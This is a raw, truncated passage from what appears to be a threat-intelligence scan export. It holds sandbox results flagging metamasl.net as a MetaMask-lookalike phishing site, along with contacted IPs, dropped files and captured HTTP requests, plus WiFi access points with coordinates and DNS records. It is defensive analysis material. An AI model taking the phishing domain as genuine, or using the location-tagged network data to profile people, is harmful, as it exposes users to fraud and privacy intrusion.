"SM0:3784:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:3784:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3784:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3784:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00003784]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003784]\n "f213a3bc-fbce-4ad6-a09e-bbb499aa704f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\f213a3bc-fbce-4ad6-a09e-bbb499aa704f.tmp]- [targetUID: 00000000-00003784]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003784]\n "e3e444f5-3bdf-46db-9837-c7ba81a12151.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e3e444f5-3bdf-46db-9837-c7ba81a12151.tmp]- [targetUID: 00000000-00003784]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\3784_1455271828\\shopping_fre.html]- [targetUID: 00000000-00003784]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00003784]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\3784_1496187747\\Filtering Rules]- [targetUID: 00000000-00003784]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006160]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003784]\n "shopping.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\3784_1455271828\\shopping.html]- [targetUID: 00000000-00003784]\n "e3d08ea3-f64e-454e-b7c9-a3743c49cc7d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e3d08ea3-f64e-454e-b7c9-a3743c49cc7d.tmp]- [targetUID: 00000000-00003784]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.fingerprint]- [targetUID: 00000000-00003784]\n "bb56cbed-4a21-463b-bd79-c1344bc69767.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\bb56cbed-4a21-463b-bd79-c1344bc69767.tmp]- [targetUID: 00000000-00003784]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\LOG]- [targetUID: 00000000-00003784]\n "7a6ae75d-e992-40e0-b597-977e151f18ad.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\7a6ae75d-e992-40e0-b597-977e151f18ad.tmp]- [targetUID: 00000000-00007240]\n "Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00003784]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\3784_2051281609\\_metadata\\verified_contents.json]- [targetUID: 00000000-00003784]\n "e6051345-1cca-48ef-9dbc-7df5a8571dfb.tmp" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e6051345-1cca-48ef-9dbc-7df5a8571dfb.tmp]- [targetUID: 00000000-00003784]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42"\n Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.42\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 172.67.30.148 on port 443"\n "HTTPS traffic to 185.199.110.153 on port 443"\n "HTTPS traffic to 104.17.24.14 on port 443"\n "HTTPS traffic to 65.8.158.45 on port 443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://getbootstrap.com/docs/4.0/examples/floating-labels/"\n Heuristic match: "zeptojs.com"\n Heuristic match: "C/_2877fc0_0be3b648f2_21898108c2b168a7cbe47279bb0cd47b3071S3c0bee2.ht"\n Heuristic match: "dpo@fi-group.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attc | 185.199.110.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:AA:8C:9E) | 41.8781, -87.6298 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-github-request-id: 69FA:0168:26C3619:3A6662D:645DAA55 | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 02:54:12 | HTTP Status Code | No | Web Spider | 0 | 0 | 1 | 0 | None | 200 | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CoxWiFi (Net ID: 00:0D:67:8C:21:AC) | 39.0469, -77.4903 |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 5 | 0 | 3 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU | https://www.ayhu.xyz/ |
| 2023-05-12 02:55:24 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://metamasl.net/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "matomo.etoreeth.com"\n "metamasl.net"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"8.210.172.191:443"\n "142.250.188.10:443"\n "142.250.189.202:443"\n "142.250.188.3:443"\n "142.250.191.46:443"\n "142.251.32.46:443"\n "43.251.41.15:443"\n "104.16.88.5:443"\n "142.251.214.131:443"\n "47.242.77.136:443"\n "104.17.183.73:443"\n "104.16.89.5:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "142.250.191.34:443"\n "142.251.32.38:443"\n "142.251.32.42:443"\n "142.250.189.182:443"\n "142.250.191.33:443"\n "185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_97c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_97c_IE_EarlyTabStart_0xcf4_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_97c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2428"\n "IsoScope_97c_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_97c_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_97c_ConnHashTable<2428>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_97c_IESQMMUTEX_0_303"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Tar3CB.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar573.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab572.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab3BB.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"mm-close-black_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Explore-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "Browse-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "wallet-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "social-35_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "dapp-compound_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "undo_2x_1_.png" has type "PNG image data 96 x 96 8-bit gray+alpha non-interlaced"- [targetUID: N/A]\n "payload_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 450x450 components 3"- [targetUID: N/A]\n "counters_1_.gif" has type "GIF image data version 89a 1 x 1"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003304]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc-_1_.woff" has type "Web Open Font Format TrueType length 20012 version 1.1"- [targetUID: N/A]\n "V0HGCQ2Y.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V0HGCQ2Y.txt]- [targetUID: 00000000-00003304]\n "dapp-opensea_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "config_1_.js" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "6VGQERV2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6VGQERV2.txt]- [targetUID: 00000000-00002428]\n "hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "js_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc-.woff HTTP/1.1\nAccept: */*\nReferer: https://www.youtube.com/embed/YVgfHZMFFFQ\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://www.youtube.com\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "youtube")\n "GET /s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff HTTP/1.1\nAccept: */*\nReferer: https://www.youtube.com/embed/YVgfHZMFFFQ\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://www.youtube.com\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nIf-Modified-Since: Mon, 16 Oct 2017 17:32:56 GMT\nDNT: 1\nConnection: Keep-Alive" (Indicator: "youtube")\n "GET /embed/YVgfHZMFFFQ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nReferer: https://metamasl.net/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.youtube.com\nDNT: 1\nConnection: Keep-Alive\nCookie: CONSENT=WP.2676ba" (Indicator: "youtube")\n "GET /pagead/id HTTP/1.1\nAccept: */*\nReferer: https://www.youtube.com/embed/YVgfHZMFFFQ\nAccept-Language: en-US\nOrigin: https://www.youtube.com\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: googleads.g.doubleclick.net\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "youtube")\n "GET /pagead/id?slf_rd=1 HTTP/1.1\nAccept: */*\nReferer: https://www.youtube.com/embed/YVgfHZMFFFQ\nAccept-Language: en-US\nOrigin: https://www.youtube.com\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: googleads.g.doubleclick.net\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "youtube")\n "HTTP/1.1 302 Found\nP3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"\nTiming-Allow-Origin: *\nCross-Origin-Resource-Policy: cross-origin\nLocation: https://googleads.g.doubleclick.net/pagead/id?slf_rd=1\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Origin: https://www.youtube.com\nDate: Sun, 12 Feb 2023 01:00:28 GMT\nPragma: no-cache\nExpires: Fri, 01 Jan 1990 00:00:00 GMT\nCache-Control: no-cache, no-store, must-revalidate\nContent-Type: text/html; charset=UTF-8\nX-Content-Type-Options: nosniff\nServer: cafe\nContent-Length: 0\nX-XSS-Protection: 0\nAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000" (Indicator: "youtube")\n "GET /instream/ad_status.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.youtube.com/embed/YVgfHZMFFFQ\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: static.doubleclick.net\nIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT\nDNT: 1\nConnection: Keep-Alive" (Indicator: "youtube")\n "OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/1.1\nAccept: */*\nOrigin: https://www.youtube.com\nAccess-Control-Request-Method: POST\nAccess-Control-Request-Headers: x-goog-api-key, content-type, x-user-agent\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows N | 185.199.109.153 |
| 2023-05-12 02:57:23 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | portainer.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:94:30:70) | 41.8781, -87.6298 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PHK140 (Net ID: 00:01:E3:04:F3:9A) | 52.3759, 4.8975 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_phone (Net ID: 00:0C:E6:C9:2D:E3) | 50.8897, 6.0563 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BeensGroep (Net ID: 00:01:21:1C:17:A0) | 52.3759, 4.8975 |
| 2023-05-12 03:32:00 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.1:443 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Raw Data from RIRs | No | Censys | 0 | 0 | 4 | 0 | None | {"last_updated_at": "2023-05-12T00:39:56.858Z", "ip": "2600:1f18:2489:8200::c8", "location_updated_at": "2023-05-10T21:06:43.663615Z", "autonomous_system_updated_at": "2023-05-10T21:06:43.664291Z", "location": {"province": "Washington", "city": "Seattle", "country": "United States", "coordinates": {"latitude": 47.5413, "longitude": -122.3129}, "postal_code": "98108", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"admirable-sawine-258e70.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-12T12:07:20.591261186Z"}, "www.writingsubmissiontracker.com": {"record_type": "CNAME", "resolved_at": "2023-03-29T20:18:06.345552317Z"}, "fishietime.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T12:06:16.369720917Z"}, "adwtt-2021.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T12:08:16.331503175Z"}, "fitness-for-hire.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T12:14:12.312546246Z"}, "docs.avohq.io": {"record_type": "CNAME", "resolved_at": "2023-03-28T16:11:01.233563954Z"}, "au.podandparcel.com": {"record_type": "CNAME", "resolved_at": "2023-03-30T16:00:18.714848447Z"}, "fosterr-prod.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T18:06:13.588030615Z"}, "fervent-shockley-921698.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-04T12:07:52.496791149Z"}, "askdrfigo-drportal.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-17T12:07:52.205880574Z"}, "elegant-tesla-a1ea12.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-05T12:08:03.794016320Z"}, "a244ca4d-f02d-4158-9d95-f3ecc3f53891.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-04-01T23:11:30.247345504Z"}, "www.carobee.com": {"record_type": "CNAME", "resolved_at": "2023-03-29T23:13:35.058671591Z"}, "buildandtone.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T12:14:05.200621107Z"}, "orthodox.cashforcars.io": {"record_type": "CNAME", "resolved_at": "2023-03-14T00:28:21.035306733Z"}, "www.mmwmarine.com": {"record_type": "CNAME", "resolved_at": "2023-03-02T14:27:26.178750795Z"}, "www.oehu.org": {"record_type": "CNAME", "resolved_at": "2023-05-08T21:49:53.230466821Z"}, "amazing-monstera-507875.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-17T12:07:52.087973415Z"}, "prae.hcosmin.ro": {"record_type": "CNAME", "resolved_at": "2023-05-01T02:30:40.584393332Z"}, "www.wyattboyer.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T14:41:58.989657965Z"}, "app.nakise.org": {"record_type": "CNAME", "resolved_at": "2022-12-22T22:18:11.155660010Z"}, "oms-user.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-06T12:08:14.593436334Z"}, "lauraxu.com": {"record_type": "AAAA", "resolved_at": "2023-03-18T14:38:04.519555246Z"}, "www.markxa.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T14:05:33.932607492Z"}, "www.thelockdownroom.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T03:20:20.549352015Z"}, "galatea.investments": {"record_type": "AAAA", "resolved_at": "2023-03-10T15:30:44.210263044Z"}, "superlative-lollipop-7e1b2d.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-03T12:09:44.092336715Z"}, "darwined-api-docs.foris.ai": {"record_type": "CNAME", "resolved_at": "2023-04-12T21:43:06.097866268Z"}, "sinfitobahia.org.br": {"record_type": "AAAA", "resolved_at": "2023-05-03T12:41:58.372964765Z"}, "adoring-liskov-894667.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T18:05:54.034044971Z"}, "chefsencasa.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-23T12:07:44.780120228Z"}, "sad-colden-651d59.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-02T12:05:39.699906012Z"}, "drxmas-drugrecipts.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-01T12:08:22.715647640Z"}, "dao-lm.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T18:06:40.518073668Z"}, "agile-timer.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-16T00:14:10.570920164Z"}, "nanosensedashboard.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-01-08T12:06:04.516399086Z"}, "purplestrategiccapital.net": {"record_type": "AAAA", "resolved_at": "2023-04-28T21:01:16.210611227Z"}, "www.dealersaver.com.au": {"record_type": "CNAME", "resolved_at": "2023-05-05T12:20:41.651412114Z"}, "budget.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-06T12:08:10.884739666Z"}, "begindrop.renovate.eu.org": {"record_type": "CNAME", "resolved_at": "2022-12-23T09:06:04.180902115Z"}, "kirigamii.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T12:14:17.747709193Z"}, "polite-wisp-220514.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-08T12:07:23.458189137Z"}, "clever-montalcini-a4440b.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-09T12:06:22.236272859Z"}, "karolklabisch-beta.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-17T12:08:02.851294150Z"}, "blankk.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T20:12:31.599875305Z"}, "musing-pasteur-944869.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-03T12:09:53.217150668Z"}, "adamcassidy.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T13:08:36.899965787Z"}, "linksxrs.netlify.app": {"record_type": "AAAA", "resolved_at": "2022-12-23T02:04:48.962438278Z"}, "adairo.com": {"record_type": "AAAA", "resolved_at": "2023-04-25T13:20:23.956589050Z"}, "asil-us-icc-task-force.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T18:06:53.107800117Z"}, "agitated-cori-358df7.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-24T12:06:57.385364261Z"}, "blissful-franklin-4bf4f9.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-22T12:08:06.409034750Z"}, "minschkopattern.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-01-28T12:05:36.585201698Z"}, "fosterthewulff.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T12:07:54.220322909Z"}, "clever-chandrasekhar-7ec39e.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-17T12:07:46.791037045Z"}, "app.projexion.io": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:54:00.586302912Z"}, "pod-flat.syndicut.io": {"record_type": "CNAME", "resolved_at": "2023-02-22T17:15:07.185464982Z"}, "ctrlup-signature.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T21:38:22.288735403Z"}, "ones.studio": {"record_type": "AAAA", "resolved_at": "2023-01-07T17:14:49.921899710Z"}, "admin.cuthequeue.com": {"record_type": "CNAME", "resolved_at": "2023-04-20T18:00:23.885081666Z"}, "dansabelli.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T12:08:13.317776977Z"}, "aesthetic-babka-1b6f1e.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-11T12:05:33.610465015Z"}, "druckzauber-erfolgreich-drucken-de.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T12:14:15.500256290Z"}, "dev--stream-alerts-v2.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-25T00:09:57.686313332Z"}, "minschkopattern.blumfelix.com": {"record_type": "CNAME", "resolved_at": "2023-05-02T05:42:07.653366604Z"}, "admirable-stardust-6a2b73.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-14T12:06:07.762491546Z"}, "drna.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-08T12:07:24.236571686Z"}, "accruent.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T12:07:47.807554309Z"}, "clever-davinci-4e13a8.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-13T12:05:11.708344705Z"}, "afli.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-09T12:06:11.740841843Z"}, "www.andraztech.si": {"record_type": "CNAME", "resolved_at": "2023-02-16T20:22:31.755627780Z"}, "rvh-admin-dev.netlify.app": {"record_type": "AAAA", "resolved_at": 